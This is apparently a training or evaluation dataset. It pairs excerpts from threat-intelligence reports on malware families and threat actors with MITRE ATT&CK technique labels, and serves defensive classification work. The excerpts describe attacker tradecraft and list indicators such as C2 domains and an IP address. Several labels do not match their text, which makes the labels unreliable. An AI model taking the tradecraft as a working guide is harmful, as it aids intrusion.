{"text1":"ZxShell.dll is injected in a shared SVCHOST process. The Svchost group registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost is opened and the netsvc group value data is queried to generate a name for the service","labels":"['T1055.001']"}
|
|
{"text1":"MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. Upon successful intrusion, they have used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks","labels":"['T1614.001', 'T1082']"}
|
|
{"text1":"DriveSlayer is digitally signed using a valid certificate and also abuses a legitimate EaseUS Partition Master driver to gain raw disk access and manipulate the disk to make the system inoperable","labels":"['T1553.002']"}
|
|
{"text1":"Like any other typical PoS malware, Pillowmint iterates a list of processes and processes them two at a time. It uses the API OpenProcess() using the\u00a0PROCESS_VM_READ and PROCESS_QUERY_INFORMATION flags to obtain a handle then reads the memory\u2019s content via ReadProcessMemory() API two chunks at a time. Depending on the Pillowmint version, it may encrypt the stolen CC data with the AES encryption algorithm + Base64. This is then written to a file named \"ldb_e.log\" in the Windows System directory","labels":"['T1106']"}
|
|
{"text1":"Along with the EDRPOU numbers, the backdoor collects proxy and email settings, including usernames and passwords, from the M.E.Doc application","labels":"['T1087.003']"}
|
|
{"text1":"Kimsuky is a highly motivated threat actor targeting a number of entities in South Korea. This group has been relentlessly creating new infection chains to deliver different types of malware to their victims. Such targeted attacks can result in the leak of restricted research, unauthorized access for espionage and even destructive attacks against target organizations","labels":"['T1588.002']"}
|
|
{"text1":"Once the Bazar loader downloads its payload, the Bazar backdoor, it is decrypted using the same method as the aforementioned Team9 variant","labels":"['T1104']"}
|
|
{"text1":"For the investigators at NCC Group and Fox-IT these pieces of evidence supported the hypothesis of the adversary achieving credentials access by brute force, and more specifically by credential stuffing or password spraying","labels":"['T1589.001']"}
|
|
{"text1":"Once gaining the initial foothold into a container, Hildegard establishes either a tmate session or an IRC channel back to the C2. It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose. At the time of writing, tmate sessions are the only way the attacker interacts with the compromised containers","labels":"['T1219', 'T1219']"}
|
|
{"text1":"After loading its configuration data, GoldMax checks the current date-time value of the compromised system against the activation date from the configuration data","labels":"['T1016', 'T1497.003', 'T1124']"}
|
|
{"text1":"Once the VBScript in XSL has been run, console commands launched by the JS code continue to be executed. Three files are copied into the folder OFFICE12 that was created in the user profile. Those files are","labels":"['T1220']"}
|
|
{"text1":"POSHSPY makes the most of using built-in Windows features \u2013 so-called \u201cliving off the land\u201d \u2013 to make an especially stealthy backdoor. POSHSPY's use of WMI to both store and persist the backdoor code makes it nearly invisible to anyone not familiar with the intricacies of WMI. Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory. The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult. Every aspect of POSHSPY is efficient and covert","labels":"['T1059.001']"}
|
|
{"text1":"The attack typically begins with an attempt \u2013 most probably via a spearphishing email \u2013 to lure the intended victim into running the malicious dropper, which is attached to the email. In order to increase the likelihood that the unsuspecting victim will actually click on it, the malicious executable masquerades as a document or spreadsheet by displaying a fake icon","labels":"['T1566.001', 'T1204.002']"}
|
|
{"text1":"From the main function, the malware invokes a function named eiht_get_update. This function attempts to read a remote file (ret.txt) from andrewka6.pythonanywhere.com that contained the address of the remote command and control server. If that failed, the malware would default to using the hard-coded (albeit encrypted) IP address 167.71.237.219. In order to gather information about the infected host, it invokes a function named: ei_get_host_info \u2026which in turn invokes various macOS APIs such as getlogin and gethostname","labels":"['T1620']"}
|
|
{"text1":"It executes the other modules and collects initial information about the machine, including information about the network, locale, and the keyboard language","labels":"['T1082']"}
|
|
{"text1":"On February 12, 2018 at 16:45 (all times are in the\u00a0organization\u2019s local time), an email was sent to the organization advertising a job vacancy at an American global service provider. The email contained a malicious link to hxxp:\/\/mynetwork.ddns[DOT].net:880","labels":"['T1566.002']"}
|
|
{"text1":"Figure 3 outlines the architecture of Crutch version 3. It includes a backdoor that communicates with a hardcoded Dropbox account using the official HTTP API. In some variants, we noticed the presence of recovery C&C channels using either GitHub or a regular domain","labels":"['T1071.001']"}
|
|
{"text1":"Loader Trojan The payload dropped to the system by the macro is an executable that is responsible for installing and executing a dynamic link library (DLL) to the system. The loader has several coding features that make it interesting. Upon execution, the loader will decrypt the embedded payload (DLL) using a custom algorithm followed by decompressing it using the RtlDecompressBuffer API. This API is normally used for Windows drivers, but there is nothing to prevent a userland process from using it, and the parameters are documented on MSDN. The compression algorithm used is LZNT1 with maximum compression level. The payload is decrypted using a starting 10-byte XOR key of: 0x3950BE2CD37B2C7CCBF8. The payload is in the loader at file offset: 0x19880 - 0x1F23C size of 0x59BD. The payload can be decrypted and decompressed with the following Python script","labels":"['T1027']"}
|
|
{"text1":"After analyzing the final payload, we determined the winner was\u2026 a Remote Administration Tool, which we have named ROKRAT. The address used in the email was 'kgf2016@yonsei.ac.kr' which is the contact email of the Korea Global Forum where the slogan in 2016 was \"Peace and Unification of the Korean Peninsula\". This fact gives more credit and legitimacy to the email. This file is decoded and finally an executable is launched: ROKRAT. This RAT has the added complexity that the command and control servers are legitimate websites. The malware uses Twitter and two cloud platforms, Yandex and Mediafire, apparently for both C2 communications and exfiltration platforms. Unfortunately, these platforms are difficult to block globally within organizations as their use can be viewed as legitimate in most cases. Additionally, these 3 platforms all make use of HTTPS connectivity, making it much more difficult to identify specific patterns or the usage of specific tokens","labels":"['T1102.002']"}
|
|
{"text1":"Using reg to configure the registry of remote computers limits the parameters that you can use in some operations. Check the syntax and parameters for each operation to verify that they can be used on remote computers","labels":"['T1112', 'T1012']"}
|
|
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) \u2014 This simple downloader's code is similar to the main xxmm payload. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. DGet \u2014 This simple downloader (see Figure 4) is similar to the wget web server retrieval tool. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1140']"}
|
|
{"text1":"All the network parameters are stored in the sample and can be easily updated by the author. The CnC is a web server: http:\/\/camilleoconnell[.]website The network communication is performed in HTTP. The malware uses a hardcoded User-Agent: Mozilla\/5.0 (compatible; Googlebot\/2.1; +http:\/\/www.google.com\/bot.html) To register a new infected system the malware performs a POST request to \/api\/white_walkers\/new with data on the compromised system consisting of","labels":"['T1071.001']"}
|
|
{"text1":"The\u202fSodomMain\u202fmodule is\u202fLookBack\u202fmalware\u2019s remote access Trojan module that can send and receive numerous commands indicative of its function as a RAT. The malware is delivered within the encoded data\u202fthat is received by the\u202fSodomNormal\u202fmodule as part of its initial beacon response. It then runs within the\u202fSodomNormal\u202fmodule and\u202fuses its\u202f\u201csend_data\u201d\u202ffunction for C&C communications","labels":"['T1574.002']"}
|
|
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - Screen Capture Tool\u2014 This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Screen Capture Tool usage. Source: Secureworks) - RarStar \u2014 This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. WinRAR \u2014 This tool extracts tools for lateral movement and compresses data for exfiltration. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Install a background monitor tool (e.g","labels":"['T1113']"}
|
|
{"text1":"The shellcode then creates a string that it uses to create a registry key to automatically run the final payload each time the system starts. It then opens the registry key 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon' and sets the value to the \"Shell\" subkey to the previously created string. Ultimately, the following registry key is created for persistence","labels":"['T1547.014', 'T1547.004']"}
|
|
{"text1":"We at Team Nautilus detected and analyzed the Docker Hub account hildeteamtnt, which was used by TeamTNT to store their malicious images. Also, \u2018minerescape\u2019 contained a shell script executing a Python file - minedaemon.py. Using a web service (iplogger[.]org) to transmit collected data to the attacker during the discovery process, for instance, the number of cores in the CPU, its speed, system details (using uname -a), and targeted host IP address. Logging the activity and encoding it into files (using Base64). The script sbs.sh: - Downloading 00.jpg (as \/usr\/bin\/dns_ipv4.tar.gz) which is the file \/usr\/bin\/bioset. - Creating a child process that listens to the socket and communicates with the father using a method called \u2018Named PIPE\u2019 (also known as FIFO). The father is responsible for deciphering messages and writing it back to the child on the PIPE. - Logging the activity and encoding it into files (using Base64). - Defense Evasion Techniques: Removing system logs (\/var\/log\/syslog). Deleting command history. Encoding many snippets with base64 (the same snippet may be encoded multiple times). To sum it up, over four months, TeamTNT uploaded various images, with some being used to perform attacks in the wild","labels":"['T1027']"}
|
|
{"text1":"In September 2017, Proofpoint researchers detailed the history and ongoing activities of an actor we track as TA505. TA505 was behind many of the Dridex campaigns that plagued organizations in 2015 and introduced Locky ransomware in 2016, bringing unprecedented scale to malicious spam distribution. Since we wrote our original TA505 profile, the actor has continued to explore the use of new malicious attachments and new payloads. In 2018, though, the scale and regularity of their campaigns decreased, while the diversity of payloads has increased. Given the importance of this actor in the email threat landscape we wanted to revisit our profile and update it with the latest activity from TA505","labels":"['T1566.001']"}
|
|
{"text1":"Remember, Downadup\/Conficker spread so widely because so many computers simply did not have a simple security patch, released months before the infections ever started, applied. Weafer ). - Use a robust security software suite that has multiple layers of protection. Even patched systems are continuing to become infected with the .A and .B variants. In many instances, this is occurring because the worm is being passed on via infected removable media, such as USB thumb drives, that are essentially acting as host carriers. Need to Know) - Use caution when opening attachments and accepting file transfers. Use caution when clicking on links to Web pages. Use strong passwords","labels":"['T1091']"}
|
|
{"text1":"FIN6 used encoded PowerShell commands to install Cobalt Strike on compromised systems. The attacker made use of Cobalt Strike\u2019s \u201cpsexec\u201d lateral movement command to create a Windows service named with a random 16-character string on the target system and execute encoded PowerShell. In some cases, the encoded PowerShell commands were used to download and execute content hosted on the paste site hxxps:\/\/pastebin[.]com","labels":"['T1102', 'T1569.002']"}
|
|
{"text1":"At this point, the script establishes an HTTP connection to the C2 server. If the server response is comprised only of the same GUID that the malware sent, the script deletes itself. In the case of the second-stage script from Variant A, the script deletes the registry key where it is installed. In the case of Variant C, the script deletes the file from which it is running. If instead the server responds with any data other than the GUID, the second-stage script decrypts the data and saves it as a file","labels":"['T1070.004', 'T1070']"}
|
|
{"text1":"Since the original publication of this approach, Proofpoint researchers have observed a number of actors -- \u201cearly adopters\u201d -- abusing this file format by embedding it inside Microsoft Word and PDF documents. While the combination of the technique with the Microsoft Word container was described in the initial research, embedding inside PDFs has not been documented and likely originated with another source","labels":"['T1204.001', 'T1204.002']"}
|
|
{"text1":"Then extract the image file \"image1.jpeg\" contained in the document. Find the special logo in the picture data, decode the subsequent steganographic PE data, release the randomly named .exe in the %ALLUSERSPROFILE% directory and run it","labels":"['T1027.003']"}
|
|
{"text1":"Enables remote login - Enables screen sharing - Configures remote login permissions for the user - Allows remote login to all - Enables a hidden \u201croot\u201d account in macOS and sets the password specified in the Trojan code","labels":"['T1569.001']"}
|
|
{"text1":"The persistence is done during the first execution of the malware using a well-known technique, the \u201cLogon scripts\u201d. It creates a script file registration.bat and writes several strings from the TForm1 object. The final script is","labels":"['T1037.001']"}
|
|
{"text1":"The backdoor starts by collecting basic information about the victim\u2019s machine and calculating a 4-byte long victim identifier, based on the user-name, computer-name and the domain name of the target environment","labels":"['T1082']"}
|
|
{"text1":"To install Weave Scope on the server the attackers use an exposed Docker API port and create a new privileged container with a clean Ubuntu image. The container is configured to mount the file system of the container to the filesystem of the victim server, thus gaining the attackers access to all files on the server. The initial command given to the container is to download and execute several cryptominers","labels":"['T1611']"}
|
|
{"text1":"Watering holes - Weaponized documents exploiting the Dynamic Data Exchange (DDE) method - Weaponized documents exploiting the CVE-2018-0798 vulnerability in Equation Editor - Exploitation of the CVE-2019-0604 vulnerability in Sharepoint - Supply chain attack that compromises a chat software installer, Able Desktop - Exploitation of recent vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in Microsoft Exchange Server","labels":"['T1195.002', 'T1190']"}
|
|
{"text1":"This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. Here is an example of code similarities on the execution via named pipe function. On the left a sample from Bisonal 2014 and on the right Bisonal 2011","labels":"['T1105']"}
|
|
{"text1":"Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module. However, as it is far from stealthy, in the long run it is no match for a capable organization. The variety of tools Gamaredon has at its disposal can be very effective at fingerprinting a machine and understanding what sensitive data is available, then spreading throughout the network","labels":"['T1025']"}
|
|
{"text1":"The communication between the malware and the server is based on the HTTP protocol and slightly varies between the samples. Every few seconds the backdoor sends a POST request to the C&C URL. The result is encrypted and sent back to another URL on the server as the parameter of a POST request","labels":"['T1071.001']"}
|
|
{"text1":"Check for blocklisted usernames and computernames: The implant concatenates the username and computer it acquires from the infected endpoint's environment variables. This string is then checked against a list of blocklisted values to determine if the implant should continue execution or exit out. Check for blocklisted process names: The following process names are blocklisted and if found running on the system, the RAT implant will simply exit. The blocklist consists of processes belonging to Virtual Machine software (such as VMWare) and analysis tools (such as ProcessHacker etc","labels":"['T1033', 'T1057', 'T1082', 'T1497.001']"}
|
|
{"text1":"It also creates a unique system specific identifier that it will use during the C2 communications to send and receive messages. The system specific identifier is a 16 character string that the Trojan creates using the serial number of the C volume and the first 4 hexadecimal bytes from Environment.UserName","labels":"['T1071.003']"}
|
|
{"text1":"This document uses KernelCallbackTable as well to hijack the control flow just like our first module, the injection technique used by the shellcode also resembles the first document. The major difference in this document is that it tries to retrieve a remote HTML page and then executes it using mshta.exe. The remote HTML page is located at https[:]\/\/markettrendingcenter[.]com\/member.htm and throws a 404 Not Found which makes it difficult for us to analyze this document any further","labels":"['T1218.005']"}
|
|
{"text1":"2) Download the OpenSSL library. Instead of saving the downloaded file, QakBot measures the download speed and deletes the received file","labels":"['T1016.001']"}
|
|
{"text1":"This script is executed and is used to decode a static base64 string within the strEncode variable. Using base64 encoding the decoded binary is stored as HncModuleUpdate.exe and is then executed. This specific resource contains malicious shellcode used by the malware. These execution steps allow the launch of the new ROKRAT variant by decoding the PE binary and injecting into the cmd.exe process","labels":"['T1059.005']"}
|
|
{"text1":"In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The malicious attachment was a simple PE file (SHA256: 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63) with the filename <redacted> Technical Services.exe. Its sole purpose here is to install the QUADAGENT backdoor and execute it. Once the victim downloads and executes the email attachment, it runs silently with no additional decoy documents or decoy dialog boxes. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails","labels":"['T1204.001']"}
|
|
{"text1":"From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality. Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more. However, our current analysis shows no way for such code to be executed","labels":"['T1070.004', 'T1070.001']"}
|
|
{"text1":"BackdoorDiplomacy is a group that primarily targets diplomatic organizations in the Middle East and Africa, and less frequently, telecommunication companies. Their initial attack methodology is focused on exploiting vulnerable internet-exposed applications on webservers, in order to drop and execute a webshell. Post compromise, via the webshell, BackdoorDiplomacy deploys open-source software for reconnaissance and information gathering, and favors the use of DLL search order hijacking to install its backdoor, Turian. Finally, BackdoorDiplomacy employs a separate executable to detect removable media, likely USB flash drives, and copy their contents to the main drive\u2019s recycle bin","labels":"['T1574.001']"}
|
|
{"text1":"It will use an auto-run registry (HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run) named AdobeMX that will execute PowerShell to load the encoded executable via reflective loading (loading an executable from memory rather than from the system\u2019s disks","labels":"['T1059.001']"}
|
|
{"text1":"Change file owner and group. This utility is used by malware to change the user ID and\/or the group ID of the specified files. This can lock other users out of access to the file, thus hampering removal or inspection. It may also be required in order to execute a file in certain elevated contexts","labels":"['T1562.001']"}
|
|
{"text1":"The iContact binary appears to be a backdoor that gathers user and locale data and engages in encrypted communications with a C2 server over TCP. Functionality includes sending and receiving files and running custom commands such as scanning a directory and deleting files","labels":"['T1005']"}
|
|
{"text1":"Overview of discovered Ramsay versions . Malicious documents dropping Ramsay version 1 . This attack vector consists of malicious documents exploiting CVE-2017-0199 intended to drop an older version of Ramsay. Based on the low complexity of the Ramsay agent delivered, the threat actors may be embedding this specific instance within these malicious documents for evaluation purposes. Even though affected documents will be modified, it won\u2019t impact their integrity; each affected Word document remains fully operational after artifact appending has taken place. First, Ramsay looks for Word documents and also, in more recent versions, for PDFs and ZIP archives: Figure 13. Hex-Rays output of spreader scanning routines . It is important to notice that there is a correlation between the target drives Ramsay scans for propagation and control document retrieval. File structure changes during an infection and execution . All of the different artifacts involved in the infection stage are either within the context of the spreader or dropped previously by another Ramsay component. This information will be contained within all logged information Ramsay collects and may be leveraged by operators in order to do further lateral movement over the network in a later stage via a different channel. Some of Ramsay and Retro filename convention . It is important to highlight that among Retro\u2019s documented techniques, it leverages malicious instances of msfte.dll, oci.dll and lame_enc.dll, and via Phantom DLL Hijacking. As previously documented, Ramsay also uses this technique in some of its versions also using msfte.dll and oci.dll. Finally, we noticed Korean language metadata within the malicious documents leveraged by Ramsay, denoting the use of Korean-based templates","labels":"['T1027']"}
|
|
{"text1":"When G-Data published on Turla\/Uroburos back in February, several questions remained unanswered. One big unknown was the infection vector for Turla (aka Snake or Uroburos). Our analysis indicates that victims are infected via a sophisticated multi-stage attack, which begins with the Epic Turla. In time, as the attackers gain confidence, this is upgraded to more sophisticated backdoors, such as the Carbon\/Cobra system. Sometimes, both backdoors are run in tandem, and used to \u201crescue\u201d each other if communications are lost with one of the backdoors","labels":"['T1124', 'T1057', 'T1049', 'T1018']"}
|
|
{"text1":"Thursday, April 16, 2020 . PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors . News summary . - Azerbaijan government and energy sector likely targeted by an unknown actor. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. Afterward, it copies 7,074,638 bytes from the end of the file and writes the remaining bytes back to the disk. One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. For each FTP usage, the credentials are provided by the C2 server during the request. Start routine The communication between the scripts is done via a file called \"Abibliophobia23\" Commands and results are written into the file using a custom encryption scheme. The binary uses a file system watcher in order to generate an event each time a file is modified in one of the directories in the \"Paths\" variable of the configuration file. Filesystem monitoring routine Once a file is available, the Dog.exe binary exfiltrates it, using email or FTP depending on the configuration. Additional tools . During our investigation, we identified a couple of additional tools mainly in Python and compiled for Windows: - Klog.exe: A keylogger using an output file called \"System32.Log. Tre.py\": A script used to create the file with the files\/directories tree","labels":"['T1105']"}
|
|
{"text1":"This is an application document that has been used to provide a decoy to the Bisonal malware. This conference has some high-ranking government and business attendees. In 2019, a Russian RTF document \u2014 \u0441\u0443\u0434\u0430\u043b\u0433\u0430\u0430.doc (research.doc) \u2014 was used with an exploit to drop the winhelp.wll file, which contains Bisonal. Based on our research and the released paper mentioned above, the Bisonal malware is part of the Tonto Team arsenal. Tonto Team was mentioned in the media in 2017 as one of the actors who targeted South Korea, when the country announced it would deploy a Terminal High-Altitude Air Defense (THAAD) in response to North Korean missile tests. At this time, researchers connected the Tonto Team to China","labels":"['T1203']"}
|
|
{"text1":"Various scans and queries are used to find proxy settings, domain controllers, remote desktop services, Citrix services, and network shares. If the obtained valid account is already a member of the domain admins group, the first lateral move in the network is usually to a domain controller where the adversary also deploys a Cobalt Strike beacon. Otherwise, a jump host or other system likely used by domain admins is found and equipped with a Cobalt Strike beacon. If the victim\u2019s network contains other Windows domains or different network security zones, the adversary scans and finds the trust relationships and jump hosts, attempting to move into the other domains and security zones","labels":"['T1021.002', 'T1018']"}
|
|
{"text1":"The first of FIN7's new tools is BOOSTWRITE \u2013 an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators","labels":"['T1553.002']"}
|
|
{"text1":"TA505 has also recently used LOLbins and legitimate Windows OS processes to perform malicious activities and deliver a payload without being detected. As the entry point of an attack, it delivers a sophisticated email containing a malicious Excel or Word file","labels":"['T1566.002']"}
|
|
{"text1":"Tricks of the Trade: A Deeper Look Into TrickBot\u2019s Machinations . TrickBot is a new banking Trojan. An Unusual Man-in-the-Browser Technique . Nowadays, most modern financial malware families are capable of injecting malicious code into ongoing browser sessions (e.g. For this purpose, and much like other advanced banking Trojans, TrickBot deploys a browser-hooking engine designed to intercept communications to and from the victim\u2019s internet browser. With the real-time fetching trick, the malicious code injections themselves are kept securely on the attacker\u2019s server, not in a file on the victim\u2019s endpoint. 7) Finally, TrickBot\u2019s financial module replaces the original response that would normally come from the bank with the C2\u2019s response, and the injected page is displayed on the victim\u2019s end. The actor can turn the webinjections on or off on the fly, easily modify the injections and then push an update to some or all the infected victims instantaneously. Figure 2: TrickBot\u2019s Server Side Web-Injects \u2014 Top Level Flow. Figure 5: TrickBot and Dyre both use \u201csourcelink\u201d and \u201csourcequery\u201d for their communications. TrickBot passes the target URLs list to its financial module, which is injected into the browser using pipes communication. A redirection attack, in short, means that instead of injecting malicious code into the original webpage, the victim is now redirected to a new site forged by the fraudsters","labels":"['T1185']"}
|
|
{"text1":"No exploits were used, so the victim would have to manually execute the malware dropper, which pretends to be an Adobe Flash installer. However, our analysis confirmed that Bad Rabbit uses the EternalRomance exploit as an infection vector to spread within corporate networks","labels":"['T1036.005', 'T1204.002']"}
|
|
{"text1":"The Rundll32Call exported function begins by creating a named event named \u2018RunOnce\u2019. This event ensures that only a single instance of DDKong is executed at a given time. If this is the only instance of DDKong running at the time, the malware continues. DDKong attempts to decode an embedded configuration using a single byte XOR key of 0xC3. Once decoded, the configuration contains the data shown in Figure 5 below","labels":"['T1140']"}
|
|
{"text1":"The formula uses a command prompt to run a PowerShell script that attempts to download and execute a second PowerShell script hosted at the URL hxxp:\/\/micrrosoft[.]net\/winupdate.ps1. By default, Excel will not launch the command prompt application, but will do so with the user\u2019s consent via the following dialog box in Figure 3","labels":"['T1547.001', 'T1059.001', 'T1059.001']"}
|
|
{"text1":"the malicious DLL installed as a Print Processor) is stored as a file on disk; the modules are stored in the registry by the installer (from the CrLnc.dat file) and are described in Table 6","labels":"['T1547.012']"}
|
|
{"text1":"More specifically, Ramsay looks for either of two given encoded Hardware Profile GUIDs. One of these GUIDs is hardcoded as shown in Figure 14, while the other is dynamically generated based on the compromised victim\u2019s machine. If any of the subject identifiers are found, parsing for a command signature will be attempted","labels":"['T1082']"}
|
|
{"text1":"Then, it drops C:\\Users\\Public\\x.vbs. Then it drops, C:\\Users\\Public\\Natso.bat. Then, it executes `Natso.bat`, which is a \"fileless\" UAC bypass found by James Forshaw. If C:\\Windows\\Finex still doesn't exist (which means the UAC bypass failed), it will update the Natso.bat and execute it using the code shown below. This is another UAC bypass technique based on fodhelper.exe. On our test machine, the last bypass was successful, and `C:\\Windows\\Finex` was successfully created. After that, the DLL deletes the dropped file and exits","labels":"['T1070.004']"}
|
|
{"text1":"To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable","labels":"['T1574.007']"}
|
|
{"text1":"As covered above, the attacker dropped two files: Chaos and Client. Chaos is the backdoor that enables the reverse-shell and Client is needed to initiate the connect-back from chaos","labels":"['T1573.001', 'T1059.004']"}
|
|
{"text1":"Turla has many names in the information security industry \u2014 it is also known as Snake, Venomous Bear, Uroburos and WhiteBear. Turla\u00a0likes to use compromised web servers and hijacked satellite connections for their command and control (C2) infrastructure. In some operations, they also do not directly communicate to the C2 server. Instead, they use a compromised system inside the targeted network as a proxy, which forwards the traffic to the real C2 server. Well-known malware like Crutch or Kazuar are attributed to Turla. Lately, we have also seen research that has shown potential links between the Sunburst backdoor and Turla. Not every campaign run by Turla can clearly be attributed to them","labels":"['T1584.004']"}
|
|
{"text1":"Create processes - Write responses from the control server to a file - Send information for all drives - Write data sent by the control server to a temporary file matching the file path pattern %temp%\\DWS00* - Change the time of a file as specified by the control server","labels":"['T1070.006']"}
|
|
{"text1":"Something that makes Kobalos unique is the fact that the code for running a C&C server is in Kobalos itself. Any server compromised by Kobalos can be turned into a C&C server by the operators sending a single command. As the C&C server IP addresses and ports are hardcoded into the executable, the operators can then generate new Kobalos samples that use this new C&C server","labels":"['T1059.004']"}
|
|
{"text1":"Finally, the command: system_profiler SPHardwareDataType 2>\/dev\/null || awk \u2018\/Boot ROM Version\/ {split($0, line, \u201c:\u201d);printf(\u201c%s\u201d, line[2]);} checks if the machine is one of the following: \u201cMBP\u201d, \u201cMBA\u201d, \u201cMB\u201d, \u201cMM\u201d, \u201cIM\u201d, \u201cMP\u201d and \u201cXS\u201d. These codes represent the model of the system. For instance, \u201cMBP\u201d stands for MacBook Pro, \u201cMBA\u201d stands for MacBook Air and so on","labels":"['T1497.001']"}
|
|
{"text1":"Whenever winword makes any graphical call, the shellcode executes. This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap","labels":"['T1140', 'T1574.013', 'T1620']"}
|
|
{"text1":"X-Session: 0\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. DLL side loading is often used to maintain persistence on the compromised system. Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. HttpBrowser URI. Source: Dell SecureWorks) - ChinaChopper web shell \u2014 A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. ChinaChopper web shell. shown in Figure 4, are required to interact with the web shell","labels":"['T1059.003']"}
|
|
{"text1":"WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware","labels":"['T1547.001']"}
|
|
{"text1":"This specific module appears to have been put together from public sources with some added functionality from the attackers. Perhaps the most interesting part here is the unusual command and control mechanism based on TCP\/UDP packets, as well as the C&C hostname\u00a0which fits previously known Turla activity","labels":"['T1205']"}
|
|
{"text1":"The domain fabianiarte.com (fabianiarte.it) was compromised to host backend server code and malicious DOTM files. This domain hosted DOTM files that were used to mimic defense contractors\u2019 job profiles as observed in Operation North Star, but the domain also included some rudimentary backend server code that we suspect was used by the implant. According to our analysis of this cache of data this site was compromised to host code on 7\/9\/2020","labels":"['T1584.001']"}
|
|
{"text1":"More interesting, however, is that it also contains support for Windows execution via SMB shares and IPC. The sample also has a Windows version of the malware embedded inside that it can install on remote Windows shares and then execute as a service","labels":"['T1021.002']"}
|
|
{"text1":"One for 32-bit and the other for 64-bit, which download an updated version of the loader. The main difference between the two loops is that in case of a Windows x64 infection, there is no check of the loader\u2019s version","labels":"['T1082']"}
|
|
{"text1":"It drops ransom notes at various folders in the system and opens one after it has encrypted the data and documents of the victim. As with usual ransomware, it does this to extort money from the victim in exchange for the decryption of their files","labels":"['T1486']"}
|
|
